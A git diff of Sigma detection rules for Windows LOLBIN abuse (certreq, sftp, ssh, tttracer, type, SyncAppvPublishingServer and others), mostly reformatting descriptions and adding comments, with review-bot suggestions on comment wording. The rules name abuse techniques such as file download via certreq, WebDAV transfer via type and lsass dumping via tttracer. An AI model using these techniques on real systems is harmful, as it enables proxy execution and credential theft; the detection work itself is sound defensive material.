+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_runscripthelper.yml
@@ -20,8 +20,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: surfacecheck
- NewProcessName|endswith: \Runscripthelper.exe
+ CommandLine|contains: surfacecheck
+ NewProcessName|endswith: \Runscripthelper.exe
 condition: process_creation and selection
 fields:
 - CommandLine
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_scriptrunner.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_scriptrunner.yml
index bdbfa97d6..dbb35f08e 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_scriptrunner.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_scriptrunner.yml
@@ -1,8 +1,7 @@
 title: Use of Scriptrunner.exe
 id: 64760eef-87f7-4ed3-93fd-655668ea9420
 status: test
-description: The "ScriptRunner.exe" binary can be abused to proxy execution through
- it and bypass possible whitelisting
+description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -19,10 +18,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \ScriptRunner.exe
- - OriginalFileName: ScriptRunner.exe
+ - NewProcessName|endswith: \ScriptRunner.exe
+ - OriginalFileName: ScriptRunner.exe
 selection_cli:
- CommandLine|contains: ' -appvscript '
+ CommandLine|contains: ' -appvscript '
 condition: process_creation and (all of selection*)
 falsepositives:
 - Legitimate use when App-v is deployed
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_setres.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_setres.yml
index e24e67e12..e553950c2 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_setres.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_setres.yml
@@ -1,9 +1,7 @@
 title: Use of Setres.exe
 id: 835e75bf-4bfd-47a4-b8a6-b766cac8bcb7
 status: test
-description: Detects the use of Setres.exe to set the screen resolution and then potentially
- launch a file named "choice" (with any executable extension such as ".cmd" or
- ".exe") from the current execution path
+description: Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named "choice" (with any executable extension such as ".cmd" or ".exe") from the current execution path
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Setres/
 - https://twitter.com/0gtweet/status/1583356502340870144
@@ -24,7 +22,7 @@ detection:
 Channel: Security
 selection:
 ParentProcessName|endswith: \setres.exe
- NewProcessName|endswith: \choice
+ NewProcessName|endswith: \choice
 condition: process_creation and (all of selection*)
 falsepositives:
 - Legitimate usage of Setres
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_sftp.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_sftp.yml
index 135c794bb..9f1a7a3cb 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_sftp.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_sftp.yml
@@ -1,8 +1,7 @@
 title: Use Of The SFTP.EXE Binary As A LOLBIN
 id: a85ffc3a-e8fd-4040-93bf-78aff284d801
 status: test
-description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the
- "-D" flag
+description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
 references:
 - https://github.com/LOLBAS-Project/LOLBAS/pull/264
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -19,10 +18,13 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains:
+ CommandLine|contains:
+ # Since "-D" is a valid flag for other usage we assume the user is going to enter a path
+ # Either a full one like "C:\Windows\System32\calc.exe" or a relative one "..\..\..\Windows\System32\calc.exe"
+ # In my testing you can't execute direct binaries by their name via this method (if you found a way please update the rule)
 - ' -D ..'
 - ' -D C:\'
- NewProcessName|endswith: \sftp.exe
+ NewProcessName|endswith: \sftp.exe
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml
index 293a78f26..949633705 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml
@@ -1,9 +1,7 @@
 title: Sideloading Link.EXE
 id: 6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6
 status: test
-description: Detects the execution utitilies often found in Visual Studio tools that
- hardcode the call to the binary "link.exe". They can be abused to sideload any
- binary with the same name
+description: Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name
 references:
 - https://twitter.com/0gtweet/status/1560732860935729152
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -19,8 +17,9 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: LINK /
- NewProcessName|endswith: \link.exe
+ CommandLine|contains: LINK / # Hardcoded command line when we call tools like dumpbin.exe, editbin.exe, lib.exe...etc
+ # Add other filters for other legitimate locations
+ NewProcessName|endswith: \link.exe
 filter_visual_studio:
 ParentProcessName|startswith:
 - C:\Program Files\Microsoft Visual Studio\
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_sigverif.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_sigverif.yml
index 640833371..1493f8400 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_sigverif.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_sigverif.yml
@@ -1,8 +1,7 @@
 title: Suspicious Sigverif Execution
 id: 7d4aaec2-08ed-4430-8b96-28420e030e04
 status: test
-description: Detects the execution of sigverif binary as a parent process which could
- indicate it being used as a LOLBIN to proxy execution
+description: Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution
 references:
 - https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/
 - https://twitter.com/0gtweet/status/1457676633809330184
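Review bot: The added line `# Add other filters for other legitimate locations` sits inside `selection`, between the `CommandLine` and `NewProcessName` fields, yet it refers to the `filter_visual_studio` block that follows, so a reader of `selection` will take it as a note about the match itself. Moving it directly above `filter_visual_studio:` and naming the block it concerns, e.g. `# filter_visual_studio: add further install locations of legitimate link.exe callers here`, keeps the guidance next to the list it is meant to extend. The `ParentProcessName|startswith:` list under `filter_visual_studio` continues past the end of this hunk.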
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_ssh.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_ssh.yml
index 1e2136f82..38e1239b9 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_ssh.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_ssh.yml
@@ -22,14 +22,15 @@ detection:
 EventID: 4688
 Channel: Security
 selection_parent:
+ # ParentCommandLine: '"C:\Windows\System32\OpenSSH\sshd.exe" -R'
 ParentProcessName: C:\Windows\System32\OpenSSH\sshd.exe
 selection_cli_img:
- NewProcessName|endswith: \ssh.exe
+ NewProcessName|endswith: \ssh.exe
 selection_cli_flags:
- - CommandLine|contains: ProxyCommand=
- - CommandLine|contains|all:
- - PermitLocalCommand
- - LocalCommand
+ - CommandLine|contains: ProxyCommand=
+ - CommandLine|contains|all:
+ - PermitLocalCommand
+ - LocalCommand
 condition: process_creation and (selection_parent or all of selection_cli_*)
 falsepositives:
 - Legitimate usage for administration purposes
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml
index 7e7079bfb..331b421e1 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml
@@ -1,8 +1,7 @@
 title: Suspicious LOLBIN AccCheckConsole
 id: 0f6da907-5854-4be6-859a-e9958747b0aa
 status: test
-description: Detects suspicious LOLBIN AccCheckConsole execution with parameters as
- used to load an arbitrary DLL
+description: Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL
 references:
 - https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340
 - https://twitter.com/bohops/status/1477717351017680899?s=12
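Review bot: The new `# ParentCommandLine: '"C:\Windows\System32\OpenSSH\sshd.exe" -R'` line inside `selection_parent` is a commented-out field with no explanation, so it is unclear whether it documents what the parent typically looks like or is a field that was deliberately left out of the match; only `ParentProcessName` is actually matched. A short label removes the ambiguity, e.g. `# Example only, not matched: ParentCommandLine: '"C:\Windows\System32\OpenSSH\sshd.exe" -R'`, and if it is intended to be matched later a TODO would be clearer than a bare commented field. The intent is inferred from the line's placement; the hunk does not state it.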
@@ -19,10 +18,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \AccCheckConsole.exe
- - OriginalFileName: AccCheckConsole.exe
+ - NewProcessName|endswith: \AccCheckConsole.exe
+ - OriginalFileName: AccCheckConsole.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' -window '
 - .dll
 condition: process_creation and (all of selection*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_atbroker.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_atbroker.yml
index fedb9a36d..13398bd7c 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_atbroker.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_atbroker.yml
@@ -19,10 +19,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: start
- NewProcessName|endswith: AtBroker.exe
+ CommandLine|contains: start
+ NewProcessName|endswith: AtBroker.exe
 filter:
- CommandLine|contains:
+ CommandLine|contains:
 - animations
 - audiodescription
 - caretbrowsing
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml
index e7e49cbb4..3d3d3ac0a 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml
@@ -1,8 +1,7 @@
 title: Suspicious Certreq Command to Download
 id: 4480827a-9799-4232-b2c4-ccc6c4e9e12b
 status: test
-description: Detects a suspicious certreq execution taken from the LOLBAS examples,
- which can be abused to download (small) files
+description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Certreq/
 author: Christian Burkard (Nextron Systems)
@@ -19,10 +18,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \certreq.exe
- - OriginalFileName: CertReq.exe
+ - NewProcessName|endswith: \certreq.exe
+ - OriginalFileName: CertReq.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' -Post '
 - ' -config '
 - ' http'
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml
index f5fc85333..bf5264c0d 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml
@@ -1,8 +1,7 @@
 title: Suspicious Driver Install by pnputil.exe
 id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1
 status: test
-description: Detects when a possible suspicious driver is being installed via pnputil.exe
- lolbin
+description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
 references:
 - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax
 - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html
@@ -20,13 +19,13 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains:
+ CommandLine|contains:
 - -i
 - /install
 - -a
 - /add-driver
 - '.inf'
- NewProcessName|endswith: \pnputil.exe
+ NewProcessName|endswith: \pnputil.exe
 condition: process_creation and selection
 fields:
 - SubjectUserName
@@ -35,9 +34,7 @@ fields:
 - ParentCommandLine
 falsepositives:
 - Pnputil.exe being used may be performed by a system administrator.
- - Verify whether the user identity, user agent, and/or hostname should be making
- changes in your environment.
- - Pnputil.exe being executed from unfamiliar users should be investigated. If
- known behavior is causing false positives, it can be exempted from the rule.
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_dxcap.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_dxcap.yml
index 1d4f32792..57d23131f 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_dxcap.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_dxcap.yml
@@ -19,10 +19,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \DXCap.exe
- - OriginalFileName: DXCap.exe
+ - NewProcessName|endswith: \DXCap.exe
+ - OriginalFileName: DXCap.exe
 selection_cli:
- CommandLine|contains: ' -c '
+ CommandLine|contains: ' -c ' # The ".exe" is not required to run the binary
 condition: process_creation and (all of selection*)
 falsepositives:
 - Legitimate execution of dxcap.exe by legitimate user
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_grpconv.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_grpconv.yml
index 70645295a..c8435810f 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_grpconv.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_grpconv.yml
@@ -1,8 +1,7 @@
 title: Suspicious GrpConv Execution
 id: f14e169e-9978-4c69-acb3-1cff8200bc36
 status: test
-description: Detects the suspicious execution of a utility to convert Windows 3.x
- .grp files or for persistence purposes by malicious software or actors
+description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors
 references:
 - https://twitter.com/0gtweet/status/1526833181831200770
 author: Florian Roth (Nextron Systems)
@@ -18,7 +17,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains:
+ CommandLine|contains:
 - grpconv.exe -o
 - grpconv -o
 condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml
index 38882e4f8..25d3dd93b 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml
@@ -20,10 +20,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains:
+ CommandLine|contains:
 - '0x0110'
 - 0x01100:40
- NewProcessName|endswith: \sqldumper.exe
+ NewProcessName|endswith: \sqldumper.exe
 condition: process_creation and selection
 falsepositives:
 - Legitimate MSSQL Server actions
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml
index a33c2e6c7..3e462d71d 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml
@@ -1,8 +1,8 @@
 title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code
 id: fbd7c32d-db2a-4418-b92c-566eb8911133
 related:
- - id: fde7929d-8beb-4a4c-b922-be9974671667
- type: obsoletes
+ - id: fde7929d-8beb-4a4c-b922-be9974671667
+ type: obsoletes
 status: test
 description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
 references:
@@ -22,10 +22,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \SyncAppvPublishingServer.exe
- - OriginalFileName: syncappvpublishingserver.exe
+ - NewProcessName|endswith: \SyncAppvPublishingServer.exe
+ - OriginalFileName: syncappvpublishingserver.exe
 selection_cli:
- CommandLine|contains: '"n; '
+ CommandLine|contains: '"n; '
 condition: process_creation and (all of selection_*)
 fields:
 - SubjectUserName
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml
index f02916486..525e10cef 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml
@@ -20,9 +20,9 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - \SyncAppvPublishingServer.vbs
- - ;
+ - ; # at a minimum, a semi-colon is required
 condition: process_creation and selection
 fields:
 - SubjectUserName
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_tracker.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_tracker.yml
index 4568915cb..53c90794c 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_tracker.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_tracker.yml
@@ -18,15 +18,19 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \tracker.exe
- - Description: Tracker
+ - NewProcessName|endswith: \tracker.exe
+ - Description: Tracker
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /d '
 - ' /c '
 filter_msbuild1:
- CommandLine|contains: ' /ERRORREPORT:PROMPT '
+ CommandLine|contains: ' /ERRORREPORT:PROMPT '
 filter_msbuild2:
+ # Example:
+ # GrandparentImage: C:\Program Files\Microsoft Visual Studio\2022\Community\Msbuild\Current\Bin\MSBuild.exe
+ # ParentCommandLine: "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" /nologo /nodemode:1 /nodeReuse:true /low:false
+ # CommandLine: "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\Tracker.exe" @"C:\Users\user\AppData\Local\Temp\tmp05c7789bc5534838bf96d7a0fed1ffff.tmp" /c "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.29.30133\bin\HostX86\x64\Lib.exe"
 ParentProcessName|endswith:
 - \Msbuild\Current\Bin\MSBuild.exe
 - \Msbuild\Current\Bin\amd64\MSBuild.exe
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_ttdinject.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_ttdinject.yml
index 1ec15ad8a..ddb49e707 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_ttdinject.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_ttdinject.yml
@@ -1,8 +1,7 @@
 title: Use of TTDInject.exe
 id: b27077d6-23e6-45d2-81a0-e2b356eea5fd
 status: test
-description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809
- and newer to debug time travel (underlying call of tttracer.exe)
+description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/
 author: frack113
@@ -18,8 +17,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- - NewProcessName|endswith: ttdinject.exe
- - OriginalFileName: TTDInject.EXE
+ - NewProcessName|endswith: ttdinject.exe
+ - OriginalFileName: TTDInject.EXE
 condition: process_creation and selection
 falsepositives:
 - Legitimate use
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml
index aa3ac6653..40eece5ac 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml
@@ -1,16 +1,15 @@
 title: Time Travel Debugging Utility Usage
 id: 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a
 related:
- - id: e76c8240-d68f-4773-8880-5c6f63595aaf
- type: derived
+ - id: e76c8240-d68f-4773-8880-5c6f63595aaf
+ type: derived
 status: test
-description: Detects usage of Time Travel Debugging Utility. Adversaries can execute
- malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
+description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/
 - https://twitter.com/mattifestation/status/1196390321783025666
 - https://twitter.com/oulusoyum/status/1191329746069655553
-author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative"
+author: Ensar Şamil, @sblmsrsn, @oscd_initiative
 date: 2020/10/06
 modified: 2022/10/09
 tags:
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_type.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_type.yml
index 385acf5ef..ec4afbed0 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_type.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_type.yml
@@ -1,8 +1,7 @@
 title: Potential Download/Upload Activity Using Type Command
 id: aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f
 status: test
-description: Detects usage of the "type" command to download/upload data from WebDAV
- server
+description: Detects usage of the "type" command to download/upload data from WebDAV server
 references:
 - https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -14,17 +13,18 @@ logsource:
 product: windows
 category: process_creation
 detection:
+ # Note that since built in CMD commands do not trigger a process creation. This would be detected only if used in a "/c" command
 process_creation:
 EventID: 4688
 Channel: Security
 selection_upload:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - 'type '
 - ' > \\\\'
 selection_download:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - type \\\\
- - ' > '
+ - ' > ' # Space are added to increase atom length and speed up matching. If your backend can handle this remove the space
 condition: process_creation and (1 of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_unregmp2.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_unregmp2.yml
index 74bc90ca8..23e195abf 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_unregmp2.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_unregmp2.yml
@@ -1,8 +1,7 @@
 title: Lolbin Unregmp2.exe Use As Proxy
 id: 727454c0-d851-48b0-8b89-385611ab0704
 status: test
-description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom
- version of "wmpnscfg.exe"
+description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/
 author: frack113
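Review bot: The comment added above `process_creation:` is a sentence fragment ("Note that since built in CMD commands do not trigger a process creation. This would be ...") whose first clause never reaches a main verb, so the reader has to guess at the point being made. A self-contained wording would be `# "type" is a cmd.exe built-in and produces no process-creation event on its own; this rule only fires when the command is passed to cmd.exe via "/c"`. The trailing comment on `' > '` has a number-agreement slip as well: `# Spaces are added to increase atom length and speed up matching. If your backend can handle this, remove the space`. Both are comment-only changes; the selections in this hunk differ from the old side only in indentation.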
@@ -18,10 +17,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \unregmp2.exe
- - OriginalFileName: unregmp2.exe
+ - NewProcessName|endswith: \unregmp2.exe
+ - OriginalFileName: unregmp2.exe
 selection_cmd:
- CommandLine|contains: ' /HideWMP'
+ CommandLine|contains: ' /HideWMP'
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_utilityfunctions.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_utilityfunctions.yml
index e6f4e8081..15ba6e467 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_utilityfunctions.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_utilityfunctions.yml
@@ -1,8 +1,7 @@
 title: UtilityFunctions.ps1 Proxy Dll
 id: 0403d67d-6227-4ea8-8145-4e72db7da120
 status: test
-description: Detects the use of a Microsoft signed script executing a managed DLL
- with PowerShell.
+description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
 references:
 - https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/
 author: frack113
@@ -18,7 +17,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains:
+ CommandLine|contains:
 - UtilityFunctions.ps1
 - 'RegSnapin '
 condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml
index 79e95ba4b..6eb69c057 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml
@@ -1,11 +1,10 @@
 title: Visual Basic Command Line Compiler Usage
 id: 7b10f171-7f04-47c7-9fa2-5be43c76e535
 status: test
-description: Detects successful code compilation via Visual Basic Command Line Compiler
- that utilizes Windows Resource to Object Converter.
+description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Vbc/
-author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative"
+author: Ensar Şamil, @sblmsrsn, @oscd_initiative
 date: 2020/10/07
 modified: 2021/11/27
 tags:
@@ -20,7 +19,7 @@ detection:
 Channel: Security
 selection:
 ParentProcessName|endswith: \vbc.exe
- NewProcessName|endswith: \cvtres.exe
+ NewProcessName|endswith: \cvtres.exe
 condition: process_creation and selection
 falsepositives:
 - Utilization of this tool should not be seen in enterprise environment
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml
index 95081903f..292fdaa96 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml
@@ -1,8 +1,7 @@
 title: Use of VisualUiaVerifyNative.exe
 id: b30a8bc5-e21b-4ca2-9420-0a94019ac56a
 status: test
-description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass
- and is listed in Microsoft's recommended block rules.
+description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
 references:
 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/
 - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
@@ -21,8 +20,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- - NewProcessName|endswith: \VisualUiaVerifyNative.exe
- - OriginalFileName: VisualUiaVerifyNative.exe
+ - NewProcessName|endswith: \VisualUiaVerifyNative.exe
+ - OriginalFileName: VisualUiaVerifyNative.exe
 condition: process_creation and selection
 falsepositives:
 - Legitimate testing of Microsoft UI parts.
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml
index 47c845316..194f88375 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml
@@ -1,8 +1,7 @@
 title: Use of VSIISExeLauncher.exe
 id: 18749301-f1c5-4efc-a4c3-276ff1f5b6f8
 status: test
-description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can
- be used to execute arbitrary binaries
+description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries
 references:
 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -18,10 +17,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \VSIISExeLauncher.exe
- - OriginalFileName: VSIISExeLauncher.exe
+ - NewProcessName|endswith: \VSIISExeLauncher.exe
+ - OriginalFileName: VSIISExeLauncher.exe
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - ' -p '
 - ' -a '
 condition: process_creation and (all of selection*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_wfc.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_wfc.yml
index 5c16bae45..74ee4d8f9 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_wfc.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_wfc.yml
@@ -1,8 +1,7 @@
 title: Use of Wfc.exe
 id: 49be8799-7b4d-4fda-ad23-cafbefdebbc5
 status: test
-description: The Workflow Command-line Compiler can be used for AWL bypass and is
